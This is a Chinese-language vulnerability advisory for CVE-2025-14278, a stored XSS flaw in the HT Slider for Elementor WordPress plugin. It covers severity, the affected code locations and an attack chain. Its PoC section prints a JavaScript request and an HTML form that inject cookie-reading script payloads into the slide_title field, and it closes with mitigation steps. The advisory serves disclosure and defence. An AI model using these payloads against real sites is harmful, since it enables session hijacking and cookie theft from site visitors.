CVE-2025-14278 CVSS 6.4 中危

CVE-2025-14278 | HT Slider for Elementor插件存储型XSS漏洞

披露日期: 2025-12-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-14278

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

HT Slider for Elementor WordPress插件

漏洞概述

HT Slider for Elementor是WordPress平台上一款流行的Elementor页面构建器滑块插件。该插件在1.7.4及以下所有版本中存在严重的存储型跨站脚本(XSS)漏洞。漏洞根源在于插件对用户输入的slide_title参数缺乏充分的输入清理和输出转义处理。攻击者只需拥有WordPress网站的Contributor(贡献者)级别权限即可利用此漏洞。通过在slide_title参数中注入恶意JavaScript代码，攻击者可以将恶意脚本永久存储在数据库中。当其他用户访问包含该滑块的页面时，注入的脚本将自动执行，可能导致会话劫持、敏感信息窃取、网页篡改等严重后果。此漏洞无需任何用户交互即可触发，CVSS评分6.4，属于中危级别。

技术细节

漏洞存在于HT Slider for Elementor插件的滑块标题处理逻辑中。具体问题出在assets/js/htslider-widgets.js第223行和include/addons/htslider_scroll_navigation.php第1397行。插件在处理slide_title参数时，仅进行了基础的数据保存操作，但未对用户输入进行充分的HTML实体转义或JavaScript上下文转义处理。当包含恶意脚本的标题被保存后，在前端JavaScript渲染阶段，这些未转义的内容会被直接输出到DOM中执行。攻击者可以利用此漏洞注入任意JavaScript代码，如窃取用户Cookie、伪造表单提交、修改页面内容或重定向用户到恶意网站。由于是存储型XSS，恶意脚本会持久存在于数据库中，影响所有访问该页面的用户。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress网站的Contributor或更高权限账户

STEP 2

步骤2

攻击者访问HT Slider for Elementor插件的滑块编辑页面

STEP 3

步骤3

攻击者在slide_title参数中注入恶意JavaScript代码，如<img src=x onerror=alert(document.cookie)>

STEP 4

步骤4

由于插件缺乏输入清理，恶意脚本被直接保存到数据库中

STEP 5

步骤5

包含该滑块的页面在前端渲染时，未转义的JavaScript代码被执行

STEP 6

步骤6

所有访问该页面的用户都会触发恶意脚本，导致Cookie窃取、会话劫持等安全问题

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-14278 HT Slider for Elementor Stored XSS PoC
// Requires Contributor-level access or higher

// Step 1: Create a new slider with malicious slide_title
const maliciousPayload = '<script>alert(document.cookie)</script>';

// Step 2: API request to create slider with XSS payload
fetch('/wp-json/wp/v2/ht-slider-for-elementor/sliders', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'X-WP-Nonce': wpApiSettings.nonce
    },
    body: JSON.stringify({
        title: 'Malicious Slider',
        slides: [{
            slide_title: maliciousPayload,
            slide_content: 'Test content'
        }]
    })
});

// Simple HTML PoC for manual testing:
// <form action="http://target-site/wp-admin/admin.php?page=ht-slider" method="POST">
//   <input type="hidden" name="slide_title" value="<img src=x onerror=alert(document.cookie)>" />
//   <input type="submit" value="Exploit" />
// </form>

影响范围

HT Slider for Elementor插件 <= 1.7.4

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时措施：1) 临时撤销所有Contributor级别用户的编辑权限，只保留管理员操作滑块；2) 在主题的functions.php中添加临时过滤器，对slide_title进行强制转义；3) 使用WordPress安全插件(如Wordfence)提供额外保护层；4) 限制非管理员用户访问插件相关管理页面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表